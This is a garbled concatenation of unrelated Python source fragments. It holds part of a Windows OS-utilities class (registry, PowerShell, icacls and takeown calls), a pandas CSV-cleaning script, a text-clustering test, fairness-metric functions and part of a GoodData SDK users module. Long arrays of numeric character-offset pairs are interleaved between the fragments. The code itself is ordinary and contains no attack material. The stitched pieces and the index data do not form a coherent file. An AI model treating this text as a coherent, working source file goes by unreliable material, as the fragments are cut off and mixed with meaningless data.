'WindowsPowerShell\\v1.0\\'
'powershell.exe')
args = [powershell_path]
if not self.is_nano_server():
args += ['-ExecutionPolicy', 'RemoteSigned', '-NonInteractive',
'-File']
args.append(script_path)
return self.execute_process(args, shell=False)
def execute_system32_process(self, args, shell=True, decode_output=False,
sysnative=True):
base_dir = self._get_system_dir(sysnative)
process_path = os.path.join(base_dir, args[0])
return self.execute_process([process_path] + args[1:],
decode_output=decode_output, shell=shell)
def get_maximum_password_length(self):
return 20
def set_timezone(self, timezone_name):
windows_name = windows_tz.tz_win.get(timezone_name)
if not windows_name:
raise exception.CloudbaseInitException(
"The given timezone name is unrecognised: %r" % timezone_name)
timezone.Timezone(windows_name).set(self)
def is_real_time_clock_utc(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation') as key:
try:
utc = winreg.QueryValueEx(key, 'RealTimeIsUniversal')[0]
return utc != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
raise
def set_real_time_clock_utc(self, utc):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'RealTimeIsUniversal', 0,
winreg.REG_DWORD, 1 if utc else 0)
def get_page_files(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management') as key:
values = winreg.QueryValueEx(key, 'PagingFiles')[0]
page_files = []
for value in values:
v = value.split(" ")
path = v[0]
min_size_mb = int(v[1]) if len(v) > 1 else 0
max_size_mb = int(v[2]) if len(v) > 2 else 0
page_files.append((path, min_size_mb, max_size_mb))
return page_files
def set_page_files(self, page_files):
values = []
for path, min_size_mb, max_size_mb in page_files:
values.append("%s %d %d" % (path, min_size_mb, max_size_mb))
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'PagingFiles', 0,
winreg.REG_MULTI_SZ, values)
def enable_trim(self, enable):
"""Enables or disables TRIM delete notifications."""
args = ["fsutil.exe", "behavior", "set", "disabledeletenotify",
"0" if enable else "1"]
(out, err, ret_val) = self.execute_system32_process(args)
if ret_val:
raise exception.CloudbaseInitException(
                'TRIM configuration failed.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def set_path_admin_acls(self, path):
LOG.debug("Assigning admin ACLs on path: %s", path)
# Sets ACLs for "NT AUTHORITY\SYSTEM" and "BUILTIN\Administrators"
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"icacls.exe", path, "/inheritance:r", "/grant:r",
"*S-1-5-18:(OI)(CI)F", "*S-1-5-32-544:(OI)(CI)F"])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to set path ACLs.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def take_path_ownership(self, path, username=None):
if username:
raise NotImplementedError()
LOG.debug("Taking ownership of path: %s", path)
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"takeown.exe", "/F", path])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to take path ownership.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def check_dotnet_is_installed(self, version):
# See: https://msdn.microsoft.com/en-us/library/hh925568(v=vs.110).aspx
if str(version) != "4":
raise exception.CloudbaseInitException(
"Only checking for version 4 is supported at the moment")
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\NET Framework Setup\\NDP\\'
'v%s\\Full' % version) as key:
return winreg.QueryValueEx(key, 'Install')[0] != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def get_file_version(self, path):
info = win32api.GetFileVersionInfo(path, '\\')
ms = info['FileVersionMS']
ls = info['FileVersionLS']
return (win32api.HIWORD(ms), win32api.LOWORD(ms),
win32api.HIWORD(ls), win32api.LOWORD(ls))
def get_default_script_exec_header(self):
return constant.SCRIPT_HEADER_CMD
| [
[
[
623,
633
],
[
43658,
43668
],
[
43972,
43982
],
[
48664,
48674
]
],
[
[
641,
647
],
[
1633,
1639
],
[
1667,
1673
],
[
1701,
1707
],
[
1734,
1740
],
[
1767,
1773
],
[
1799,
1805
],
[
1831,
1837
],
[
1863,
1869
],
[
1890,
1896
],
[
1920,
1926
],
[
1968,
1974
],
[
2376,
2382
],
[
2499,
2505
],
[
3203,
3209
],
[
3365,
3371
],
[
3925,
3931
],
[
4096,
4102
],
[
4182,
4188
],
[
4277,
4283
],
[
4338,
4344
],
[
4534,
4540
],
[
5133,
5139
],
[
5326,
5332
],
[
5748,
5754
],
[
5807,
5813
],
[
5981,
5987
],
[
6100,
6106
],
[
6226,
6232
],
[
6397,
6403
],
[
6438,
6444
],
[
6479,
6485
],
[
6561,
6567
],
[
6692,
6698
],
[
7114,
7120
],
[
7980,
7986
],
[
8300,
8306
],
[
9067,
9073
],
[
9708,
9714
],
[
9754,
9760
],
[
9885,
9891
],
[
10040,
10046
],
[
10162,
10168
],
[
10519,
10525
],
[
10570,
10576
],
[
10760,
10766
],
[
10812,
10818
],
[
10893,
10899
],
[
20212,
20218
],
[
20242,
20248
],
[
20338,
20344
],
[
20403,
20409
],
[
20444,
20450
],
[
20706,
20712
],
[
20751,
20757
],
[
20790,
20796
],
[
21284,
21290
],
[
23111,
23117
],
[
23343,
23349
],
[
23482,
23488
],
[
23864,
23870
],
[
24012,
24018
],
[
25185,
25191
],
[
25337,
25343
],
[
25556,
25562
],
[
25584,
25590
],
[
26043,
26049
],
[
48456,
48462
],
[
48794,
48800
],
[
48960,
48966
],
[
48996,
49002
],
[
49159,
49165
],
[
49387,
49393
],
[
49451,
49457
],
[
49608,
49614
],
[
50120,
50126
],
[
50149,
50155
],
[
50204,
50210
],
[
51570,
51576
],
[
51647,
51653
],
[
52510,
52516
],
[
53001,
53007
],
[
53387,
53393
],
[
53762,
53768
],
[
54528,
54534
],
[
54760,
54766
],
[
56286,
56292
],
[
57037,
57043
],
[
57377,
57383
],
[
57542,
57548
],
[
57594,
57600
],
[
57851,
57857
],
[
57903,
57909
],
[
58222,
58228
],
[
58269,
58275
],
[
58328,
58334
],
[
58451,
58457
],
[
58944,
58950
],
[
59207,
59213
],
[
59916,
59922
],
[
59935,
59941
],
[
59983,
59989
],
[
60683,
60689
],
[
61250,
61256
]
],
[
[
667,
675
],
[
2023,
2031
],
[
2060,
2068
],
[
2100,
2108
],
[
2144,
2152
],
[
2188,
2196
],
[
2231,
2239
],
[
2274,
2282
],
[
2313,
2321
],
[
2445,
2453
],
[
2561,
2569
],
[
2604,
2612
],
[
2649,
2657
],
[
2695,
2703
],
[
2741,
2749
],
[
2784,
2792
],
[
2828,
2836
],
[
2870,
2878
],
[
2918,
2926
],
[
2964,
2972
],
[
3010,
3018
],
[
3056,
3064
],
[
3102,
3110
],
[
3148,
3156
],
[
3264,
3272
],
[
3433,
3441
],
[
3477,
3485
],
[
3521,
3529
],
[
3564,
3572
],
[
3606,
3614
],
[
3648,
3656
],
[
3701,
3709
],
[
3747,
3755
],
[
3786,
3794
],
[
3827,
3835
],
[
3865,
3873
],
[
3980,
3988
],
[
4058,
4066
],
[
4111,
4119
],
[
4237,
4245
],
[
4397,
4405
],
[
4439,
4447
],
[
4484,
4492
],
[
4585,
4593
],
[
4625,
4633
],
[
4665,
4673
],
[
4703,
4711
],
[
4737,
4745
],
[
4770,
4778
],
[
4807,
4815
],
[
4844,
4852
],
[
4887,
4895
],
[
4930,
4938
],
[
4975,
4983
],
[
5012,
5020
],
[
5053,
5061
],
[
5093,
5101
],
[
5148,
5156
],
[
5187,
5195
],
[
5228,
5236
],
[
5268,
5276
],
[
5383,
5391
],
[
5421,
5429
],
[
5463,
5471
],
[
5503,
5511
],
[
5570,
5578
],
[
5629,
5637
],
[
5689,
5697
],
[
5866,
5874
],
[
5923,
5931
],
[
6040,
6048
],
[
6356,
6364
],
[
6632,
6640
],
[
6737,
6745
],
[
6753,
6761
],
[
6815,
6823
],
[
6872,
6880
],
[
6938,
6946
],
[
6995,
7003
],
[
7049,
7057
],
[
7128,
7136
],
[
7184,
7192
],
[
7244,
7252
],
[
7260,
7268
],
[
7320,
7328
],
[
7371,
7379
],
[
7422,
7430
],
[
7470,
7478
],
[
7488,
7496
],
[
7537,
7545
],
[
7553,
7561
],
[
7603,
7611
],
[
7619,
7627
],
[
7668,
7676
],
[
7716,
7724
],
[
7770,
7778
],
[
7787,
7795
],
[
7840,
7848
],
[
7857,
7865
],
[
7910,
7918
],
[
7927,
7935
],
[
7995,
8003
],
[
8049,
8057
],
[
8101,
8109
],
[
8188,
8196
],
[
8236,
8244
],
[
8253,
8261
],
[
8346,
8354
],
[
8393,
8401
],
[
8410,
8418
],
[
8456,
8464
],
[
8501,
8509
],
[
8571,
8579
],
[
8644,
8652
],
[
8716,
8724
],
[
8785,
8793
],
[
8854,
8862
],
[
8926,
8934
],
[
8997,
9005
],
[
9141,
9149
],
[
9210,
9218
],
[
9263,
9271
],
[
9280,
9288
],
[
9332,
9340
],
[
9386,
9394
],
[
9440,
9448
],
[
9494,
9502
],
[
9545,
9553
],
[
9597,
9605
],
[
9649,
9657
],
[
9769,
9777
],
[
9790,
9798
],
[
9842,
9850
],
[
9937,
9945
],
[
9988,
9996
],
[
10055,
10063
],
[
10105,
10113
],
[
10231,
10239
],
[
10291,
10299
],
[
10350,
10358
],
[
10406,
10414
],
[
10477,
10485
],
[
10498,
10506
],
[
10550,
10558
],
[
10665,
10673
],
[
10739,
10747
],
[
10873,
10881
],
[
10908,
10916
],
[
10929,
10937
],
[
10998,
11006
],
[
11063,
11071
],
[
11128,
11136
],
[
20184,
20192
],
[
20256,
20264
],
[
20388,
20396
],
[
20596,
20604
],
[
22749,
22757
],
[
23830,
23838
],
[
25930,
25938
],
[
48849,
48857
],
[
54456,
54464
],
[
57730,
57738
],
[
59271,
59279
],
[
59730,
59738
]
],
[
[
683,
685
],
[
28426,
28428
],
[
30852,
30854
],
[
31475,
31477
],
[
62979,
62981
],
[
63068,
63070
],
[
63158,
63160
],
[
63274,
63276
],
[
64987,
64989
],
[
65604,
65606
]
],
[
[
693,
695
],
[
55770,
55772
]
],
[
[
703,
709
],
[
56838,
56844
]
],
[
[
717,
727
],
[
25366,
25376
]
],
[
[
735,
739
],
[
40448,
40452
],
[
43619,
43623
],
[
48011,
48015
]
],
[
[
748,
755
],
[
32413,
32420
],
[
35686,
35693
],
[
37164,
37171
]
],
[
[
777,
796
],
[
1519,
1531
]
],
[
[
804,
814
],
[
41067,
41077
]
],
[
[
822,
825
],
[
20676,
20679
],
[
21125,
21128
],
[
21204,
21207
],
[
22805,
22808
],
[
22868,
22871
],
[
22929,
22932
],
[
23404,
23407
],
[
27238,
27241
],
[
53481,
53484
],
[
53888,
53891
]
],
[
[
848,
854
],
[
26641,
26647
],
[
26656,
26662
],
[
26863,
26869
],
[
34047,
34053
],
[
34079,
34085
],
[
34329,
34335
],
[
34371,
34377
],
[
34428,
34434
],
[
39285,
39291
],
[
39302,
39308
],
[
39438,
39444
],
[
39499,
39505
],
[
39525,
39531
],
[
39711,
39717
],
[
39726,
39732
],
[
39838,
39844
],
[
40022,
40028
],
[
40037,
40043
],
[
40171,
40177
],
[
40256,
40262
],
[
64445,
64451
],
[
64481,
64487
],
[
64655,
64661
],
[
66205,
66211
],
[
66220,
66226
],
[
66412,
66418
],
[
66684,
66690
],
[
66699,
66705
],
[
66875,
66881
],
[
66918,
66924
],
[
66997,
67003
],
[
67076,
67082
],
[
67091,
67097
],
[
67280,
67286
],
[
67846,
67852
],
[
67861,
67867
],
[
68052,
68058
],
[
68095,
68101
],
[
68166,
68172
],
[
70148,
70154
],
[
70163,
70169
],
[
70361,
70367
]
],
[
[
875,
885
],
[
65906,
65916
]
],
[
[
893,
901
],
[
70596,
70604
],
[
70722,
70730
],
[
70743,
70751
],
[
70780,
70788
],
[
70801,
70809
]
],
[
[
923,
929
],
[
62095,
62101
],
[
62340,
62346
],
[
62642,
62648
]
],
[
[
937,
945
],
[
15072,
15080
],
[
15127,
15135
],
[
15399,
15407
],
[
15468,
15476
],
[
16399,
16407
],
[
16468,
16476
],
[
16984,
16992
],
[
17104,
17112
],
[
17612,
17620
],
[
17674,
17682
],
[
18374,
18382
],
[
18443,
18451
],
[
18890,
18898
],
[
18959,
18967
],
[
19401,
19409
],
[
19466,
19474
],
[
19904,
19912
],
[
19966,
19974
]
],
[
[
953,
964
],
[
14830,
14841
],
[
14879,
14890
],
[
14911,
14922
],
[
15012,
15023
],
[
16082,
16093
],
[
16161,
16172
],
[
16347,
16358
],
[
17035,
17046
],
[
18232,
18243
],
[
18314,
18325
],
[
18788,
18799
]
],
[
[
972,
984
],
[
62901,
62913
]
],
[
[
992,
1005
],
[
14129,
14142
]
],
[
[
1013,
1025
],
[
12950,
12962
],
[
13026,
13038
],
[
13106,
13118
],
[
13174,
13186
],
[
13262,
13274
],
[
13344,
13356
],
[
13412,
13424
],
[
13482,
13494
],
[
13564,
13576
],
[
13644,
13656
],
[
43745,
43757
],
[
44083,
44095
],
[
44157,
44169
],
[
41391,
41403
],
[
41462,
41474
],
[
41853,
41865
],
[
41924,
41936
],
[
42444,
42456
],
[
42499,
42511
],
[
42553,
42565
],
[
42613,
42625
],
[
42872,
42884
],
[
42919,
42931
],
[
43158,
43170
],
[
43202,
43214
],
[
43256,
43268
],
[
43288,
43300
],
[
43409,
43421
],
[
43538,
43550
],
[
43794,
43806
],
[
43910,
43922
],
[
44284,
44296
],
[
44424,
44436
],
[
45092,
45104
],
[
45158,
45170
],
[
45252,
45264
],
[
45301,
45313
],
[
45385,
45397
],
[
45509,
45521
],
[
45714,
45726
],
[
45766,
45778
],
[
46007,
46019
],
[
46062,
46074
],
[
46132,
46144
],
[
46180,
46192
],
[
46228,
46240
],
[
46615,
46627
]
],
[
[
1033,
1041
],
[
41121,
41129
]
],
[
[
1069,
1077
],
[
70884,
70892
]
],
[
[
1104,
1113
],
[
29069,
29078
],
[
29913,
29922
],
[
14348,
14357
],
[
14565,
14574
],
[
15167,
15176
],
[
15565,
15574
],
[
15691,
15700
],
[
16565,
16574
],
[
16721,
16730
],
[
17148,
17157
],
[
17771,
17780
],
[
17897,
17906
],
[
18483,
18492
],
[
18999,
19008
],
[
19235,
19244
],
[
19564,
19573
],
[
19688,
19697
],
[
20006,
20015
],
[
20858,
20867
],
[
21374,
21383
],
[
21562,
21571
],
[
21681,
21690
],
[
21997,
22006
],
[
22091,
22100
],
[
22315,
22324
],
[
23174,
23183
],
[
23594,
23603
],
[
24077,
24086
],
[
25659,
25668
],
[
26095,
26104
],
[
27310,
27319
],
[
28828,
28837
],
[
29455,
29464
],
[
29644,
29653
],
[
30058,
30067
],
[
30443,
30452
],
[
31179,
31188
],
[
31744,
31753
],
[
32135,
32144
],
[
32844,
32853
],
[
33204,
33213
],
[
33585,
33594
],
[
34926,
34935
],
[
38310,
38319
],
[
44641,
44650
],
[
48529,
48538
],
[
49708,
49717
],
[
51384,
51393
],
[
51703,
51712
],
[
53196,
53205
],
[
54128,
54137
],
[
54264,
54273
],
[
54943,
54952
],
[
55322,
55331
],
[
56437,
56446
],
[
57207,
57216
],
[
58081,
58090
],
[
59056,
59065
],
[
59564,
59573
],
[
60037,
60046
],
[
60885,
60894
],
[
61416,
61425
],
[
65990,
65999
],
[
68508,
68517
],
[
69132,
69141
],
[
69666,
69675
],
[
70010,
70019
]
],
[
[
1148,
1152
],
[
11396,
11400
]
],
[
[
1185,
1196
],
[
37946,
37957
]
],
[
[
1229,
1244
],
[
28997,
29012
],
[
29842,
29857
]
],
[
[
1285,
1289
],
[
4028,
4032
],
[
10177,
10181
],
[
10534,
10538
],
[
11254,
11258
]
],
[
[
1330,
1337
],
[
28003,
28010
],
[
29248,
29255
],
[
30309,
30316
]
],
[
[
1378,
1387
],
[
14101,
14110
]
],
[
[
1428,
1436
],
[
66111,
66119
]
],
[
[
1477,
1487
],
[
1495,
1505
]
],
[
[
1489,
1492
],
[
27543,
27546
],
[
31992,
31995
],
[
34702,
34705
],
[
36009,
36012
]
],
[
[
1513,
1516
],
[
16685,
16688
],
[
22601,
22604
],
[
25002,
25005
],
[
26919,
26922
],
[
30634,
30637
],
[
32454,
32457
],
[
32692,
32695
],
[
33049,
33052
],
[
33415,
33418
],
[
36223,
36226
],
[
36604,
36607
],
[
38278,
38281
],
[
40482,
40485
],
[
40677,
40680
],
[
40896,
40899
],
[
41264,
41267
],
[
41722,
41725
],
[
42252,
42255
],
[
42756,
42759
],
[
43026,
43029
],
[
44901,
44904
],
[
45598,
45601
],
[
45879,
45882
],
[
46482,
46485
],
[
46851,
46854
],
[
47095,
47098
],
[
47334,
47337
],
[
47486,
47489
],
[
63383,
63386
],
[
68717,
68720
],
[
69415,
69418
]
],
[
[
1553,
1560
],
[
35780,
35787
]
],
[
[
1565,
1573
],
[
34011,
34019
],
[
35736,
35744
]
],
[
[
1579,
1586
]
],
[
[
1591,
1597
]
],
[
[
1602,
1616
]
],
[
[
1622,
1630
],
[
5528,
5536
],
[
6316,
6324
],
[
14184,
14192
],
[
20632,
20640
],
[
22785,
22793
],
[
25433,
25441
]
],
[
[
1656,
1664
],
[
6831,
6839
],
[
7010,
7018
],
[
7074,
7082
],
[
7146,
7154
],
[
7199,
7207
],
[
7277,
7285
],
[
7336,
7344
],
[
7389,
7397
],
[
7437,
7445
],
[
7685,
7693
],
[
7733,
7741
],
[
8066,
8074
],
[
8116,
8124
],
[
8154,
8162
],
[
8205,
8213
],
[
8317,
8325
],
[
8363,
8371
],
[
8473,
8481
],
[
8516,
8524
],
[
8732,
8740
],
[
8800,
8808
],
[
9158,
9166
],
[
9225,
9233
],
[
9296,
9304
],
[
9349,
9357
],
[
9510,
9518
],
[
9560,
9568
],
[
9614,
9622
],
[
23544,
23552
],
[
25816,
25824
],
[
25970,
25978
],
[
26301,
26309
],
[
26392,
26400
],
[
26488,
26496
],
[
27147,
27155
],
[
48428,
48436
],
[
48739,
48747
],
[
49252,
49260
],
[
49662,
49670
],
[
49877,
49885
],
[
52768,
52776
],
[
53450,
53458
],
[
53828,
53836
],
[
53982,
53990
],
[
54622,
54630
],
[
54817,
54825
],
[
56347,
56355
],
[
56700,
56708
],
[
57963,
57971
],
[
59329,
59337
],
[
59774,
59782
],
[
60400,
60408
],
[
60762,
60770
],
[
61079,
61087
],
[
61544,
61552
]
],
[
[
1690,
1698
],
[
21168,
21176
]
],
[
[
1724,
1731
],
[
23450,
23457
]
],
[
[
1756,
1764
],
[
9664,
9672
],
[
9805,
9813
],
[
49070,
49078
],
[
49515,
49523
]
],
[
[
1790,
1796
],
[
9858,
9864
],
[
50374,
50380
],
[
50466,
50472
],
[
50558,
50564
]
],
[
[
1820,
1828
],
[
10120,
10128
],
[
10366,
10374
],
[
10423,
10431
],
[
10618,
10626
],
[
10680,
10688
],
[
10946,
10954
],
[
11013,
11021
],
[
11080,
11088
],
[
56994,
57002
],
[
57464,
57472
],
[
57770,
57778
],
[
58859,
58867
],
[
60463,
60471
]
],
[
[
1854,
1860
],
[
6371,
6377
],
[
6414,
6420
],
[
6455,
6461
],
[
6496,
6502
],
[
58255,
58261
],
[
60292,
60298
]
],
[
[
1882,
1887
],
[
6524,
6529
],
[
6602,
6607
],
[
6648,
6653
],
[
6778,
6783
],
[
51627,
51632
],
[
52974,
52979
]
],
[
[
1910,
1917
],
[
9902,
9909
],
[
10072,
10079
],
[
23917,
23924
]
],
[
[
1950,
1967
],
[
23299,
23316
],
[
23357,
23374
]
],
[
[
2344,
2375
],
[
21056,
21087
]
],
[
[
2476,
2498
],
[
3299,
3321
],
[
50219,
50241
]
],
[
[
3178,
3202
],
[
9723,
9747
],
[
48808,
48832
],
[
49011,
49035
],
[
49466,
49490
]
],
[
[
3341,
3364
],
[
6576,
6599
],
[
6707,
6730
],
[
51511,
51534
],
[
51584,
51607
],
[
52451,
52474
],
[
52524,
52547
]
],
[
[
3894,
3924
],
[
10585,
10615
],
[
10775,
10805
],
[
57319,
57349
],
[
57391,
57421
]
],
[
[
4142,
4181
],
[
10827,
10866
],
[
58343,
58382
],
[
58490,
58529
]
],
[
[
4310,
4337
],
[
59675,
59702
]
],
[
[
4514,
4533
],
[
6162,
6181
],
[
25137,
25156
],
[
25199,
25218
]
],
[
[
5300,
5325
],
[
6288,
6313
],
[
25086,
25111
]
],
[
[
11143,
11159
],
[
52695,
52711
],
[
52902,
52918
]
],
[
[
11164,
11180
],
[
52713,
52729
],
[
52921,
52937
]
],
[
[
11185,
11200
],
[
52731,
52746
],
[
52940,
52955
]
],
[
[
11206,
11223
],
[
52862,
52879
]
],
[
[
11229,
11251
],
[
56948,
56970
]
],
[
[
11383,
11395
],
[
32561,
32573
],
[
33906,
33918
],
[
35933,
35945
],
[
41624,
41636
],
[
44204,
44216
],
[
44543,
44555
],
[
45022,
45034
],
[
55465,
55477
]
]
] |
from .core import *
from .usual_models import *
| [
[
[
18,
19
]
],
[
[
47,
48
]
]
] |
import pandas as pd
import re
data = pd.read_csv("BIPMetadata_current.csv")
def format_date(date_column):
# formatting the date data to display as yyyy-mm-dd
new_dates = []
for date in date_column:
month = date[0:date.find('/')]
date = date[date.find('/')+1:]
day = date[0:date.find('/')]
year = date[date.find('/')+1:]
if (len(month) == 1):
month = "0" + month
if (len(day) == 1):
day = "0" + day
if (len(year) == 2):
year = "20" + year
newDate = year + "-" + month + "-" + day
print(newDate)
new_dates.append(newDate)
return new_dates
def truncate(column, length):
# truncates given column to given length and returns new column
new_d = []
for d in column:
if (len(d) > length):
d = d[0:length]
new_d.append(d)
return new_d
# source: https://stackoverflow.com/questions/9662346/python-code-to-remove-html-tags-from-a-string
def cleanhtml(column):
new_desc = []
for d in column:
cleanr = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')
cleantext = re.sub(cleanr, '', d)
new_desc.append(' '.join(cleantext.split()))
return new_desc
def remove_spaces(column):
new_sql = []
for d in column:
new_sql.append(' '.join(d.split()))
return new_sql
new_created = format_date(data["created"])
print("UPDATAED")
new_updated = format_date(data["updated"])
new_query = remove_spaces(data["sql_query"])
new_query = truncate(new_query, 5000)
new_description = truncate(data["description"], 500)
new_description = cleanhtml(new_description)
data["created"] = new_created
data["updated"] = new_updated
data["sql_query"] = new_query
data["description"] = new_description
data.to_csv("BIPMetadata_cleaned.csv", index=False) | [
[
[
7,
19
],
[
38,
40
]
],
[
[
27,
29
],
[
1097,
1099
],
[
1179,
1181
]
],
[
[
31,
35
],
[
1432,
1436
],
[
1493,
1497
],
[
1536,
1540
],
[
1620,
1624
],
[
1693,
1697
],
[
1723,
1727
],
[
1753,
1757
],
[
1783,
1787
],
[
1823,
1827
]
],
[
[
82,
93
],
[
1420,
1431
],
[
1481,
1492
]
],
[
[
687,
695
],
[
1567,
1575
],
[
1611,
1619
]
],
[
[
1022,
1031
],
[
1664,
1673
]
],
[
[
1280,
1293
],
[
1522,
1535
]
],
[
[
1406,
1417
],
[
1711,
1722
]
],
[
[
1467,
1478
],
[
1741,
1752
]
],
[
[
1510,
1519
],
[
1576,
1585
]
],
[
[
1555,
1564
],
[
1773,
1782
]
],
[
[
1593,
1608
],
[
1674,
1689
]
],
[
[
1646,
1661
],
[
1805,
1820
]
]
] |
import os
from wellcomeml.ml.clustering import TextClustering
from wellcomeml.viz.visualize_clusters import visualize_clusters
def test_output_html(tmp_path):
"""Tests that the output html is generated correclty by the clustering function"""
    # This will be the file to write the cluster visualisation to
temporary_file = os.path.join(tmp_path, 'test-cluster.html')
# Run clustering on small dummy data (see test_clustering.py)
cluster = TextClustering(embedding_random_state=42,
reducer_random_state=43,
clustering_random_state=44)
X = ['Wellcome Trust',
'The Wellcome Trust',
'Sir Henry Wellcome',
'Francis Crick',
'Crick Institute',
'Francis Harry Crick']
cluster.fit(X)
# Run the visualisation function with output_file=temporary_file
visualize_clusters(clustering=cluster, output_file_path=temporary_file, radius=0.01,
alpha=0.5, output_in_notebook=False)
# Assert that the html was generated correctly
assert os.path.exists(temporary_file)
| [
[
[
7,
9
],
[
302,
304
],
[
1058,
1060
]
],
[
[
48,
62
],
[
427,
441
]
],
[
[
109,
127
],
[
850,
868
]
],
[
[
134,
150
]
]
] |
#!/usr/bin/env python
import numpy as np
from collections import defaultdict
import itertools
from sklearn.metrics import confusion_matrix
def print_data_stats(sens_attr, class_labels):
"""Print a few numbers about the data: Total number of points, number of
protected examples and unprotected examples, and number of protected points
in positive class, and number of unprotected points in positive class.
Parameters
-----------
sens_attr: numpy array
The sensitive attribute of shape=(number_points,).
    class_labels: numpy array
The class labels of shape=(number_points,).
"""
non_prot_all = sum(sens_attr == 1.0) # non-protected group
prot_all = len(sens_attr) - non_prot_all # protected group
non_prot_pos = sum(class_labels[sens_attr == 1.0] == 1.0) # non_protected in positive class
prot_pos = sum(class_labels == 1.0) - non_prot_pos # protected in positive class
frac_non_prot_pos = float(non_prot_pos) / float(non_prot_all)
frac_prot_pos = float(prot_pos) / float(prot_all)
    print()
print("Total data points: %d" % len(sens_attr))
print("# non-protected examples: %d" % non_prot_all)
print("# protected examples: %d" % prot_all)
print("# non-protected examples in positive class: %d (%0.1f%%)" % (non_prot_pos, non_prot_pos * 100.0 / non_prot_all))
print("# protected examples in positive class: %d (%0.1f%%)" % (prot_pos, prot_pos * 100.0 / prot_all))
def get_positive_rate(y_predicted, y_true):
"""Compute the positive rate for given predictions of the class label.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
Returns
---------
pr: float
The positive rate.
"""
tn, fp, fn, tp = confusion_matrix(y_true, y_predicted).ravel()
pr = (tp+fp) / (tp+fp+tn+fn)
return pr
def get_true_positive_rate(y_predicted, y_true):
"""Compute the true positive rate for given predictions of the class label.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
Returns
---------
tpr: float
The true positive rate.
"""
tn, fp, fn, tp = confusion_matrix(y_true, y_predicted).ravel()
tpr = tp / (tp+fn)
return tpr
def compute_fairness_measures(y_predicted, y_true, sens_attr):
"""Compute value of demographic parity and equality of opportunity for given predictions.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
sens_attr: numpy array
The sensitive labels of shape=(number_points,).
Returns
----------
DDP: float
The difference of demographic parity.
DEO: float
The difference of equality of opportunity.
"""
positive_rate_prot = get_positive_rate(y_predicted[sens_attr==-1], y_true[sens_attr==-1])
positive_rate_unprot = get_positive_rate(y_predicted[sens_attr==1], y_true[sens_attr==1])
true_positive_rate_prot = get_true_positive_rate(y_predicted[sens_attr==-1], y_true[sens_attr==-1])
true_positive_rate_unprot = get_true_positive_rate(y_predicted[sens_attr==1], y_true[sens_attr==1])
DDP = positive_rate_unprot - positive_rate_prot
DEO = true_positive_rate_unprot - true_positive_rate_prot
rates = [positive_rate_unprot, positive_rate_prot]
DP = np.min(rates)/(np.max(rates) + 1e-5)
return DDP, DEO, DP
def get_accuracy(y_true, y_predicted):
"""Compute the accuracy for given predicted class labels.
Parameters
----------
y_true: numpy array
The true class labels of shape=(number_points,).
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
Returns
---------
accuracy: float
The accuracy of the predictions.
"""
correct_answers = (y_predicted == y_true).astype(int) # will have 1 when the prediction and the actual label match
accuracy = float(sum(correct_answers)) / float(len(correct_answers))
return accuracy
| [
[
[
29,
40
],
[
3663,
3665
],
[
3678,
3680
]
],
[
[
65,
76
]
],
[
[
84,
93
]
],
[
[
122,
138
],
[
1869,
1885
],
[
2398,
2414
]
],
[
[
144,
160
]
],
[
[
1454,
1471
],
[
3114,
3131
],
[
3210,
3227
]
],
[
[
1967,
1989
],
[
3307,
3329
],
[
3413,
3435
]
],
[
[
2487,
2512
]
],
[
[
3730,
3742
]
]
] |
# (C) 2022 GoodData Corporation
from __future__ import annotations
from pathlib import Path
from typing import List, Optional, Type
import attr
from gooddata_metadata_client.model.declarative_user import DeclarativeUser
from gooddata_metadata_client.model.declarative_users import DeclarativeUsers
from gooddata_sdk.catalog.base import Base
from gooddata_sdk.catalog.identifier import CatalogUserGroupIdentifier
from gooddata_sdk.utils import create_directory, read_layout_from_file, write_layout_to_file
LAYOUT_USERS_DIR = "users"
LAYOUT_USERS_FILE = "users.yaml"
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeUsers(Base):
users: List[CatalogDeclarativeUser]
@staticmethod
def client_class() -> Type[DeclarativeUsers]:
return DeclarativeUsers
@classmethod
def load_from_disk(cls, layout_organization_folder: Path) -> CatalogDeclarativeUsers:
users_directory = layout_organization_folder / LAYOUT_USERS_DIR
users_file = users_directory / LAYOUT_USERS_FILE
data = read_layout_from_file(users_file)
users = []
for record in data:
users.append(CatalogDeclarativeUser.from_dict(record, camel_case=True))
return cls(users=users)
def store_to_disk(self, layout_organization_folder: Path) -> None:
users_directory = layout_organization_folder / LAYOUT_USERS_DIR
users_file = users_directory / LAYOUT_USERS_FILE
create_directory(users_directory)
users = [user.to_dict(camel_case=True) for user in self.users]
write_layout_to_file(users_file, users)
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeUser(Base):
id: str
auth_id: Optional[str] = None
user_groups: List[CatalogUserGroupIdentifier] = []
@staticmethod
